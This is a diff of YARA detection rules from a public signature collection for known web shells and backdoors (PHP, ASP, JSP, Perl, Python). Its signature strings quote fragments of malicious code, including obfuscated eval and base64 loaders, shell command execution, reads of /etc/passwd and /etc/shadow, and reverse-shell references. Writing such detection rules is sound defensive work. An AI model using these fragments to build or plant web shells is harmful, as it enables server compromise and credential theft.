-rule SIGNATURE_BASE_Webshell_Webshells_New_Php5
+rule SIGNATURE_BASE_Ayyildiz_Tim___AYT__Shell_V_2_1_Biz_Html
 {
 	meta:
-		description = "Web shells - generated from file php5.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file Ayyildiz Tim  -AYT- Shell v 2.1 Biz.html.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "d50a8669-fd28-59d2-9f00-f4fe2b85dc22"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3584-L3597"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4564-L4577"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "cf2ab009cbd2576a806bfefb74906fdf"
-		logic_hash = "280be378bc6cf52ef9454083180015ed00f9d0bc936620a4105c34c3a3002383"
-		score = 70
+		hash = "8a8c8bb153bd1ee097559041f2e5cf0a"
+		logic_hash = "9e2d56b49df65a2c13e15f97ec91cdbb6852d86e86f921d7c8a4db82cbea12f5"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "<?$_uU=chr(99).chr(104).chr(114);$_cC=$_uU(101).$_uU(118).$_uU(97).$_uU(108).$_u"
+		$s0 = "Ayyildiz"
+		$s1 = "TouCh By iJOo"
+		$s2 = "First we check if there has been asked for a working directory"
+		$s3 = "http://ayyildiz.org/images/whosonline2.gif"
 
 	condition:
-		all of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_PHP
+rule SIGNATURE_BASE_EFSO_2_Asp
 {
 	meta:
-		description = "Web shells - generated from file PHP.php"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file EFSO_2.asp.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "f0566790-b41c-5167-b7ec-19e7d04256d1"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3598-L3615"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4578-L4589"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a524e7ae8d71e37d2fd3e5fbdab405ea"
-		logic_hash = "706f835f63e153f907ae8a5a48f1dc4b9d3b8511b21b7155bc045b0ebdc893fc"
-		score = 70
+		hash = "b5fde9682fd63415ae211d53c6bfaa4d"
+		logic_hash = "15e5419854bcbb08f28fff1e266cca7a004f01ec0a5c313c107ec17c3aa7ffee"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "echo \"<font color=blue>Error!</font>\";" fullword
-		$s2 = "<input type=\"text\" size=61 name=\"f\" value='<?php echo $_SERVER[\"SCRIPT_FILE"
-		$s5 = " - ExpDoor.com</title>" fullword
-		$s10 = "$f=fopen($_POST[\"f\"],\"w\");" fullword
-		$s12 = "<textarea name=\"c\" cols=60 rows=15></textarea><br>" fullword
+		$s0 = "Ejder was HERE"
+		$s1 = "*~PU*&BP[_)f!8c2F*@#@&~,P~P,~P&q~8BPmS~9~~lB~X`V,_,F&*~,jcW~~[_c3TRFFzq@#@&PP,~~"
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Webshell_Webshells_New_Asp
+rule SIGNATURE_BASE_Lamashell_Php
 {
 	meta:
-		description = "Web shells - generated from file Asp.asp"
-		author = "Florian Roth (Nextron Systems)"
-		id = "393e738a-b4c2-5630-a55f-c3caee4ff75e"
-		date = "2014-03-28"
+		description = "Semi-Auto-generated  - file lamashell.php.txt"
+		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
+		id = "cbbb3377-ef9c-5fd1-a8b8-2b730fb5ef28"
+		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3616-L3631"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4590-L4602"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "32c87744ea404d0ea0debd55915010b7"
-		logic_hash = "dd2e9f753e8fa781c28c2d5bb9336bb3f39ed8a496bd89eb54bc1812ef512ab5"
-		score = 70
+		hash = "de9abc2e38420cad729648e93dfc6687"
+		logic_hash = "5e156c3057338fa7b306b91dd979851dd56b8b698cfe99e1d7b6d096a4c580e7"
+		score = 75
 		quality = 85
 		tags = ""
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s1 = "Execute MorfiCoder(\")/*/z/*/(tseuqer lave\")" fullword
-		$s2 = "Function MorfiCoder(Code)" fullword
-		$s3 = "MorfiCoder=Replace(Replace(StrReverse(Code),\"/*/\",\"\"\"\"),\"\\*\\\",vbCrlf)" fullword
+		$s0 = "lama's'hell" fullword
+		$s1 = "if($_POST['king'] == \"\") {"
+		$s2 = "if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir.\"/\".$_FILES['f"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Perlbot_Pl
+rule SIGNATURE_BASE_Ajax_PHP_Command_Shell_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file perlbot.pl.txt"
+		description = "Semi-Auto-generated  - file Ajax_PHP Command Shell.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "378cb0e4-2069-50b7-ab3e-5a81055e9983"
+		id = "cae2e035-ae7b-589b-b2d9-e709028274c5"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3635-L3646"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4603-L4615"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "7e4deb9884ffffa5d82c22f8dc533a45"
-		logic_hash = "784980d620e71fb0cf5aed9ef8bd171a8f50d850bc782645575070b75c42e426"
+		hash = "93d1a2e13a3368a2472043bd6331afe9"
+		logic_hash = "37cba26018f3d37194a143871012a61a7bcee6775d2cf5f93a52b779010d3260"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "my @adms=(\"Kelserific\",\"Puna\",\"nod32\")"
-		$s1 = "#Acesso a Shel - 1 ON 0 OFF"
+		$s1 = "newhtml = '<b>File browser is under construction! Use at your own risk!</b> <br>"
+		$s2 = "Empty Command..type \\\"shellhelp\\\" for some ehh...help"
+		$s3 = "newhtml = '<font size=0><b>This will reload the page... :(</b><br><br><form enct"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Php_Backdoor_Php
+rule SIGNATURE_BASE_Jspwebshell_1_2_Jsp
 {
 	meta:
-		description = "Semi-Auto-generated  - file php-backdoor.php.txt"
+		description = "Semi-Auto-generated  - file JspWebshell 1.2.jsp.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "aca53071-f793-538d-bbeb-34469cdb4d1f"
+		id = "edfe6a3d-7d56-52ad-a376-cec5722e87b7"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3647-L3659"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4616-L4629"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2b5cb105c4ea9b5ebc64705b4bd86bf7"
-		logic_hash = "acab82b40760b45d49da51953f78c69166955de54918634c9bfe394208cdbb56"
+		hash = "70a0ee2624e5bbe5525ccadc467519f6"
+		logic_hash = "32b3ddb00f89a3540118fe8ce5fc070556b00030dcf2b21245d38ae66e6cbc14"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "http://michaeldaw.org   2006"
-		$s1 = "or http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=c:/windows on win"
-		$s3 = "coded by z0mbie"
+		$s0 = "JspWebshell"
+		$s1 = "CreateAndDeleteFolder is error:"
+		$s2 = "<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryHashtable(\"java.c"
+		$s3 = "String _password =\"111\";"
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Liz0Zim_Private_Safe_Mode_Command_Execuriton_Bypass_Exploit_Php
+rule SIGNATURE_BASE_Sincap_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Liz0ziM Private Safe Mode Command Execuriton Bypass Exploit.php.txt"
+		description = "Semi-Auto-generated  - file Sincap.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e91114ce-18f9-51cd-b41c-b796960ea4fe"
+		id = "8c4dc7b1-94ce-5528-8442-eae05d2c9980"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3660-L3672"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4630-L4642"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c6eeacbe779518ea78b8f7ed5f63fc11"
-		logic_hash = "a0606dad4474579354709fe6306d15427afc4dec8ad6760a0ee9e91c86c23e4d"
+		hash = "b68b90ff6012a103e57d141ed38a7ee9"
+		logic_hash = "e708a7dcb26ff7d0208c1f092e14e701f2ae94c4ffca019f13064bbe04ef74d7"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</opt"
-		$s1 = "Liz0ziM Private Safe Mode Command Execuriton Bypass"
-		$s2 = "echo \"<b><font color=red>Kimim Ben :=)</font></b>:$uid<br>\";" fullword
+		$s0 = "$baglan=fopen(\"/tmp/$ekinci\",'r');"
+		$s2 = "$tampon4=$tampon3-1"
+		$s3 = "@aventgrup.net"
 
 	condition:
-		1 of them
+		2 of them
 }
-rule SIGNATURE_BASE_Nshell__1__Php_Php
+rule SIGNATURE_BASE_Test_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Nshell (1).php.php.txt"
+		description = "Semi-Auto-generated  - file Test.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "44e8b6c5-6f41-5c37-a083-26acedd91956"
+		id = "58d73264-6507-5560-ad3e-0cc86c2ee291"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3673-L3684"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4643-L4655"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "973fc89694097a41e684b43a21b1b099"
-		logic_hash = "53c7cd24c4eddbded1b4c16fd2758bdf66c0bbe396e487a56d56fc053cf3cc1a"
-		score = 75
+		hash = "77e331abd03b6915c6c6c7fe999fcb50"
+		logic_hash = "575a2eeadc8113d779057f98e978ed4f8914546117b57944bf65f1d6d84c9521"
+		score = 50
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "echo \"Command : <INPUT TYPE=text NAME=cmd value=\".@stripslashes(htmlentities($"
-		$s1 = "if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";" fullword
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";" fullword
+		$s2 = "fwrite ($fp, \"$yazi\");" fullword
+		$s3 = "$entry_line=\"HACKed by EntriKa\";" fullword
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Shankar_Php_Php
+rule SIGNATURE_BASE_Phyton_Shell_Py
 {
 	meta:
-		description = "Semi-Auto-generated  - file shankar.php.php.txt"
+		description = "Semi-Auto-generated  - file Phyton Shell.py.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "0c8ab3eb-574b-5e5a-8117-4efecef94f83"
+		id = "2f55d60d-94f3-508d-a2d0-5ab59e3fdab3"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3685-L3697"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4656-L4669"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "6eb9db6a3974e511b7951b8f7e7136bb"
-		logic_hash = "58b365206c18b8394cf1e03b71b8e47be10bc933bc2c05b7b03b7dad94f6d6b8"
+		hash = "92b3c897090867c65cc169ab037a0f55"
+		logic_hash = "ac16a95cd1fb09c93b315e3cd7d57c1ebec322b641f515854fb73a61393dd365"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$sAuthor = "ShAnKaR"
-		$s0 = "<input type=checkbox name='dd' \".(isset($_POST['dd'])?'checked':'').\">DB<input"
-		$s3 = "Show<input type=text size=5 value=\".((isset($_POST['br_st']) && isset($_POST['b"
+		$s1 = "sh_out=os.popen(SHELL+\" \"+cmd).readlines()" fullword
+		$s2 = "#   d00r.py 0.3a (reverse|bind)-shell in python by fQ" fullword
+		$s3 = "print \"error; help: head -n 16 d00r.py\"" fullword
+		$s4 = "print \"PW:\",PW,\"PORT:\",PORT,\"HOST:\",HOST" fullword
 
 	condition:
-		1 of ( $s* ) and $sAuthor
+		1 of them
 }
-rule SIGNATURE_BASE_Casus15_Php_Php
+rule SIGNATURE_BASE_Mysql_Tool_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file Casus15.php.php.txt"
+		description = "Semi-Auto-generated  - file mysql_tool.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "ba6748a2-fb80-5eda-816c-155bab9285e5"
+		id = "c67197d1-6e40-5bf2-9e1b-6ada43529435"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3698-L3710"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4670-L4682"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "5e2ede2d1c4fa1fcc3cbfe0c005d7b13"
-		logic_hash = "6ee7a07163d33ca329d3be2084406629711db14db4605e8413ee963eb0f9d5a7"
+		hash = "5fbe4d8edeb2769eda5f4add9bab901e"
+		logic_hash = "9f49bd6c56c919f678ecada82ff3d801c82c98a8abdee85cda1ec7e5b6756012"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "copy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_na"
-		$s2 = "echo \"<center><font size='$sayi' color='#FFFFFF'>HACKLERIN<font color='#008000'"
-		$s3 = "value='Calistirmak istediginiz "
+		$s0 = "$error_text = '<strong>Failed selecting database \"'.$this->db['"
+		$s1 = "$ra44  = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_SERV"
+		$s4 = "<div align=\"center\">The backup process has now started<br "
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Small_Php_Php
+rule SIGNATURE_BASE_Zehir_4_Asp
 {
 	meta:
-		description = "Semi-Auto-generated  - file small.php.php.txt"
+		description = "Semi-Auto-generated  - file Zehir 4.asp.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "cf4fb88f-a312-560d-be0b-b55bfcb889be"
+		id = "ea7df4e1-d4e2-5a58-a014-d12cb9afaf79"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3711-L3723"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4683-L4694"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "fcee6226d09d150bfa5f103bee61fbde"
-		logic_hash = "e0444aa604e8956d423037b70b9476f5653503055d0f1bc875d43de144ce5c44"
+		hash = "7f4e12e159360743ec016273c3b9108c"
+		logic_hash = "69063d866daf1709df81fa22d76177bf8d552e19725a94db4a1b2fca79387faf"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s1 = "$pass='abcdef1234567890abcdef1234567890';" fullword
-		$s2 = "eval(gzinflate(base64_decode('FJzHkqPatkU/550IGnjXxHvv6bzAe0iE5+svFVGtKqXMZq05x1"
-		$s4 = "@ini_set('error_log',NULL);" fullword
+		$s2 = "</a><a href='\"&dosyapath&\"?status=10&dPath=\"&f1.path&\"&path=\"&path&\"&Time="
+		$s4 = "<input type=submit value=\"Test Et!\" onclick=\""
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Shellbot_Pl
+rule SIGNATURE_BASE_Sh_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file shellbot.pl.txt"
+		description = "Semi-Auto-generated  - file sh.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "07c145b1-c9f7-564a-b354-a6d2072f380c"
+		id = "da691516-d6c9-5c4b-85c3-f1cd7fc96ae7"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3724-L3738"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4695-L4706"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "b2a883bc3c03a35cfd020dd2ace4bab8"
-		logic_hash = "5db224e4fe8608bb53f044ca6c0361dc66cadd58c6d4ea5ab4f8ae14ebde0e6e"
+		hash = "330af9337ae51d0bac175ba7076d6299"
+		logic_hash = "b0c3307d451e5d7dadece114e2888503a46038e2edb2ff32bf566ce47b300e76"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "ShellBOT"
-		$s1 = "PacktsGr0up"
-		$s2 = "CoRpOrAtIoN"
-		$s3 = "# Servidor de irc que vai ser usado "
-		$s4 = "/^ctcpflood\\s+(\\d+)\\s+(\\S+)"
+		$s1 = "$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/e"
+		$s2 = "Show <input type=text size=5 value=\".((isset($_POST['br_st']))?$_POST['br_st']:"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Fuckphpshell_Php
+rule SIGNATURE_BASE_Phpbackdoor15_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file fuckphpshell.php.txt"
+		description = "Semi-Auto-generated  - file phpbackdoor15.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "010db63b-ff72-5f97-8651-a1c7851471ff"
+		id = "a93b881b-3050-5f43-803c-4a571aaaef82"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3739-L3752"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4707-L4719"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "554e50c1265bb0934fcc8247ec3b9052"
-		logic_hash = "0c993960b4ca880b818c7b7ba726479ed1c64c46ef8ca82d3c990d69ebe43f42"
+		hash = "0fdb401a49fc2e481e3dfd697078334b"
+		logic_hash = "cdd105f36593e8326ca32bf7cf1fba6fb754e7305c91fe6c078323db8f59b23c"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "$succ = \"Warning! "
-		$s1 = "Don`t be stupid .. this is a priv3 server, so take extra care!"
-		$s2 = "\\*=-- MEMBERS AREA --=*/"
-		$s3 = "preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_SESSION['o"
+		$s1 = "echo \"fichier telecharge dans \".good_link(\"./\".$_FILES[\"fic\"][\"na"
+		$s2 = "if(move_uploaded_file($_FILES[\"fic\"][\"tmp_name\"],good_link(\"./\".$_FI"
+		$s3 = "echo \"Cliquez sur un nom de fichier pour lancer son telechargement. Cliquez s"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Ngh_Php_Php
+rule SIGNATURE_BASE_Phpjackal_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file ngh.php.php.txt"
+		description = "Semi-Auto-generated  - file phpjackal.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "2d8ff3c1-d6b3-57ce-8213-232b376dbd05"
+		id = "ae46cb97-1ff8-50ba-856f-c38fbb1e5163"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3753-L3767"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4720-L4731"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "c372b725419cdfd3f8a6371cfeebc2fd"
-		logic_hash = "c794b216bafdaecf5bd138cc8c7552efbb8c3c571a441489d02a19793a4c294f"
+		hash = "ab230817bcc99acb9bdc0ec6d264d76f"
+		logic_hash = "6e2ff262aecd08e5feaa274a7fd128d75565d6cc03341da7cbeb2949070705e5"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "Cr4sh_aka_RKL"
-		$s1 = "NGH edition"
-		$s2 = "/* connectback-backdoor on perl"
-		$s3 = "<form action=<?=$script?>?act=bindshell method=POST>"
-		$s4 = "$logo = \"R0lGODlhMAAwAOYAAAAAAP////r"
+		$s3 = "$dl=$_REQUEST['downloaD'];"
+		$s4 = "else shelL(\"perl.exe $name $port\");"
 
 	condition:
 		1 of them
 }
-rule SIGNATURE_BASE_Jsp_Reverse_Jsp
+rule SIGNATURE_BASE_Sql_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file jsp-reverse.jsp.txt"
+		description = "Semi-Auto-generated  - file sql.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "4953b230-4cd9-55d6-a3cb-8d3713e7fb0c"
+		id = "41730336-0dce-5ed9-95b0-c911a4e3cb48"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3768-L3780"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4732-L4744"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8b0e6779f25a17f0ffb3df14122ba594"
-		logic_hash = "bdd2db4c032b25faaaf3a3a8e769000013f643ecfcb8b0374165a244ad2162a6"
+		hash = "8334249cbb969f2d33d678fec2b680c5"
+		logic_hash = "875bdaa0072f869c983526d0aab20b4faa9187a3f32b8024658114a4c908b825"
 		score = 75
-		quality = 85
+		quality = 60
 		tags = ""
 
 	strings:
-		$s0 = "// backdoor.jsp"
-		$s1 = "JSP Backdoor Reverse Shell"
-		$s2 = "http://michaeldaw.org"
+		$s1 = "fputs ($fp, \"# RST MySQL tools\\r\\n# Home page: http://rst.void.ru\\r\\n#"
+		$s2 = "http://rst.void.ru"
+		$s3 = "print \"<a href=\\\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_Tool_Asp
+rule SIGNATURE_BASE_Cgi_Python_Py
 {
 	meta:
-		description = "Semi-Auto-generated  - file Tool.asp.txt"
+		description = "Semi-Auto-generated  - file cgi-python.py.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "e5e727bd-836b-5540-8755-40f37904bc03"
+		id = "75e99d10-3cdf-5f87-9933-4ce5ebe18b09"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3781-L3794"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4745-L4757"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "8febea6ca6051ae5e2ad4c78f4b9c1f2"
-		logic_hash = "d6bd782302b2c614fc572babb3825c0e1fcd0de5841ca8541ca27580ccc274d4"
+		hash = "0a15f473e2232b89dae1075e1afdac97"
+		logic_hash = "37c6c7db32a52c8a83ff85f0a50c6fa71e833b9e6d20b1f95e9512fe8bbd0aee"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "mailto:rhfactor@antisocial.com"
-		$s2 = "?raiz=root"
-		$s3 = "DIGO CORROMPIDO<BR>CORRUPT CODE"
-		$s4 = "key = \"5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA0"
+		$s0 = "a CGI by Fuzzyman"
+		$s1 = "\"\"\"+fontline +\"Version : \" + versionstring + \"\"\", Running on : \"\"\" + "
+		$s2 = "values = map(lambda x: x.value, theform[field])     # allows for"
 
 	condition:
-		2 of them
+		1 of them
 }
-rule SIGNATURE_BASE_NT_Addy_Asp
+rule SIGNATURE_BASE_Ru24_Post_Sh_Php_Php
 {
 	meta:
-		description = "Semi-Auto-generated  - file NT Addy.asp.txt"
+		description = "Semi-Auto-generated  - file ru24_post_sh.php.php.txt"
 		author = "Neo23x0 Yara BRG + customization by Stefan -dfate- Molls"
-		id = "18f5f360-8690-5e09-ac18-b8cc4f678811"
+		id = "78669d3e-629b-591a-a766-923e37d1fdba"
 		date = "2025-03-29"
 		modified = "2025-03-29"
 		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L3795-L3807"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/thor-webshells.yar#L4758-L4770"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "2e0d1bae844c9a8e6e351297d77a1fec"
-		logic_hash = "0fc61d5e276786b8be822712cdcfc81146998e535532e44d3da92e0668713a48"
+		hash = "5b334d494564393f419af745dc1eeec7"
+		logic_hash = "e81e5345bbe07ca85c94a3d8411f0dd3c418689ccae7115c098f718f9093b3bf"
 		score = 75
 		quality = 85
 		tags = ""
 
 	strings:
-		$s0 = "NTDaddy v1.9 by obzerve of fux0r inc"
